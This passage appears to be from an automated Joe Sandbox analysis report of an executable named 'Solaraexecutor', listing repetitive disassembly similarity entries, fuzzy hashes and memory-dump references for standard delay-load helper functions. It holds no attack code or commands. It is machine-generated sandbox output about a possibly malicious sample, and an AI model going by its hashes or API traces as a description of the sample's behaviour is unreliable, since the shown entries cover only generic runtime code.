                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: bde9523ecbffd47214c0e0bd3dd5289c2a479db86ed6681bd52ee6b2c2cab256
                                                      • Instruction ID: a7173792fc9f41a1b1c85ed93ec3798a45311ceb2394c5e61cf9a4851d0eda8a
                                                      • Opcode Fuzzy Hash: bde9523ecbffd47214c0e0bd3dd5289c2a479db86ed6681bd52ee6b2c2cab256
                                                      • Instruction Fuzzy Hash: B2B012D166A340EC3108A1451C06C37030DC0C1F11B30803EFC09C01C0E840EC080571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 60688deb00e71467bc0974a0beb5e7f7377e37475f6792b925d7c739a55ebaf0
                                                      • Instruction ID: 2fb6b4f0a5f672f644d17ff1fa308156a169908b6cdf8dd6a88c825c7eb1b346
                                                      • Opcode Fuzzy Hash: 60688deb00e71467bc0974a0beb5e7f7377e37475f6792b925d7c739a55ebaf0
                                                      • Instruction Fuzzy Hash: 1AB012D167A340EC3108A1851C06C37034DC4C0F11B30403EFC0AC01C0E840AC080571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 60bee10e75c7a633c20a4691142223839f0950a0babfa015ac73671c27439828
                                                      • Instruction ID: 808eb1a3d23a786a4014852b396cc0fff879a84ae7a9e599937ed92b10da3366
                                                      • Opcode Fuzzy Hash: 60bee10e75c7a633c20a4691142223839f0950a0babfa015ac73671c27439828
                                                      • Instruction Fuzzy Hash: E3B012D1669300EC3104E1551C06C37034CC0C1F11730803EFC09C01C0E840EC080571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 1d4eb4f3feecc3e79c5ada1876c65ee7af2e72278735e3bc50566e4488da008f
                                                      • Instruction ID: 85cdc6d2073268c7b16624bc6327dc866cc6d9f1299227638bd73e01ce9eae33
                                                      • Opcode Fuzzy Hash: 1d4eb4f3feecc3e79c5ada1876c65ee7af2e72278735e3bc50566e4488da008f
                                                      • Instruction Fuzzy Hash: 99B012E1669300FC3104A1451C06C37030DC0C1F11730803EFC09C01C0E840ED080571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 0561c08e3243debbf603fec6435a67b0242e55f4e0650af4391849809da4eceb
                                                      • Instruction ID: be6230b23f00cf577a9477480bf9c16fe1816d7294bf3a9ced8de0108bb5165d
                                                      • Opcode Fuzzy Hash: 0561c08e3243debbf603fec6435a67b0242e55f4e0650af4391849809da4eceb
                                                      • Instruction Fuzzy Hash: 77B012D1769340FC3144A2455C06C3B030CC0C0F11730813EFC1DC02C0E840AC4C0671
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 6ec8439cb7fb2a0ac27a55074424121d646a97685ad1ae9cd43ac72b641cfb36
                                                      • Instruction ID: 12ad5aed4f52d8450f5598c4f758f67e906be3af6372781ea6a300f19859a4ba
                                                      • Opcode Fuzzy Hash: 6ec8439cb7fb2a0ac27a55074424121d646a97685ad1ae9cd43ac72b641cfb36
                                                      • Instruction Fuzzy Hash: 34B012D1669300EC3104A2451D06C3B030CC0C0F11730803EFC0DC02C0EC50AD0D0571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: ab10093dce4a290978084f2d0c7f67ac3c375afbccbb7fdba6ea2709d75eb4b2
                                                      • Instruction ID: 6b62bf28f10ccfa7f8d2ae21d8fcd657cc5f6967e16fc27d1d61d66c5a56f3ac
                                                      • Opcode Fuzzy Hash: ab10093dce4a290978084f2d0c7f67ac3c375afbccbb7fdba6ea2709d75eb4b2
                                                      • Instruction Fuzzy Hash: 66B012E1669300EC3104A1451D06C37030DC0C0F11730403EFC09C01C0EC40AE090571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 3c74d51b700d514e4a94edb1d8b333ddf51c464900978b7f167e97f643ab3d34
                                                      • Instruction ID: f5423338985b367f1ff649b29991d59a3a673a9142b41992308db6e326c7a4e2
                                                      • Opcode Fuzzy Hash: 3c74d51b700d514e4a94edb1d8b333ddf51c464900978b7f167e97f643ab3d34
                                                      • Instruction Fuzzy Hash: 42B012E1669300EC3104A1461C06C37030DC0C0F11730403EFC09C01C0E840AD080571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 8429763b93a8fd3c4a31579ef5b944a924d73a2a5f0053bf24223e29c53652f9
                                                      • Instruction ID: 06ce8906823d4f28c57ab0d874e4c716337706afd40f3da9f27604dc1b9f635d
                                                      • Opcode Fuzzy Hash: 8429763b93a8fd3c4a31579ef5b944a924d73a2a5f0053bf24223e29c53652f9
                                                      • Instruction Fuzzy Hash: 72B012E1669300FC3144A1455C06C37030DC0C0F11B30413EFC09C01C0E840AD480671
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 1349c79a9cf3f04582cd6958e968dd39e628706c47fa45c3e4b7b1d0d87214e2
                                                      • Instruction ID: 344f68b676b0d0b61c3525e5979a26c2480aafe1254e7f6119e3a67fd0e12fc1
                                                      • Opcode Fuzzy Hash: 1349c79a9cf3f04582cd6958e968dd39e628706c47fa45c3e4b7b1d0d87214e2
                                                      • Instruction Fuzzy Hash: B3B012E226C200FC3104A1041C02C3B034CC0C1F13730D02EFC08E11C0D8408D0D0573
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: fb2e139bbfe4a7992cd4e67b7f903d45be0be9917f04e5cdbe57325e8965b9ce
                                                      • Instruction ID: 171b4388305187b29a59edb87960a48ff19c82c6aa727546a6ba6cf22eed1e5c
                                                      • Opcode Fuzzy Hash: fb2e139bbfe4a7992cd4e67b7f903d45be0be9917f04e5cdbe57325e8965b9ce
                                                      • Instruction Fuzzy Hash: E1B012E226C200BC310461041D02C3B434CC0C1F13730D02EFD08E51C0D8404D0E0573
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 28b11a2485631fd90a974c435cf9c8e9bd6cab51754aa091c061aef9eb4258f8
                                                      • Instruction ID: 9a54e6e7b1bcf50d2892e3034467313a6ff697b344b00cf7544f3c0872ceacb3
                                                      • Opcode Fuzzy Hash: 28b11a2485631fd90a974c435cf9c8e9bd6cab51754aa091c061aef9eb4258f8
                                                      • Instruction Fuzzy Hash: F6B012F226C100FC3104A1045C02C37034CC0C1F17730902EFC08D11C0D8408F090573
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E580
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: a7038d3a2eaae76bb51ff0392594e43a1cb503388bdc484886b7a4eb9a9373b1
                                                      • Instruction ID: 50189eb247403f532ecb5c9ce667254bd1bb53837c10dc936e14200718d52d8a
                                                      • Opcode Fuzzy Hash: a7038d3a2eaae76bb51ff0392594e43a1cb503388bdc484886b7a4eb9a9373b1
                                                      • Instruction Fuzzy Hash: 69B012C166C210BE310462551C06C37034CC0C0F15730502EFC08C11C0E8404D080571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E580
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: 56a390a054ac1fb2e10e6eda911be2aed4a9341a06a8403fa84a895821f5a685
                                                      • Instruction ID: 14b5f4f68829311540f67f60f4446a4578c4e24c6e3b7abe2cdb12ce17722260
                                                      • Opcode Fuzzy Hash: 56a390a054ac1fb2e10e6eda911be2aed4a9341a06a8403fa84a895821f5a685
                                                      • Instruction Fuzzy Hash: 02B012C166C310BC314461549C07C37035CC0C0F15730522EFC08C11C0E8404D480671
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E580
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: afe96936b1930b92e0087b4437402695bed2f05a538686ac60b43d98b00e5722
                                                      • Instruction ID: b3e80ebecca082d06bf53d443942fb0a4b25cc73481bcfbf8200c360e4dce543
                                                      • Opcode Fuzzy Hash: afe96936b1930b92e0087b4437402695bed2f05a538686ac60b43d98b00e5722
                                                      • Instruction Fuzzy Hash: 33B012C166C210BC310461945D06C37035CC0C0F15730522EFC08C11C0EC404E090571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID:
                                                      • API String ID: 1269201914-0
                                                      • Opcode ID: bf70376790f22ee0c2bad907f9b24c1f932e9b0d806089b18852d1ff3abdabb2
                                                      • Instruction ID: 48488be0de80d7e2089346547cfbca07e3e387fa20f8139fdb4c1f10496916a3
                                                      • Opcode Fuzzy Hash: bf70376790f22ee0c2bad907f9b24c1f932e9b0d806089b18852d1ff3abdabb2
                                                      • Instruction Fuzzy Hash: E6B012C1668200BC360461089C03C3B030CC0C1F15730522EFC18C01C0E8404D8C1571
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3E51F
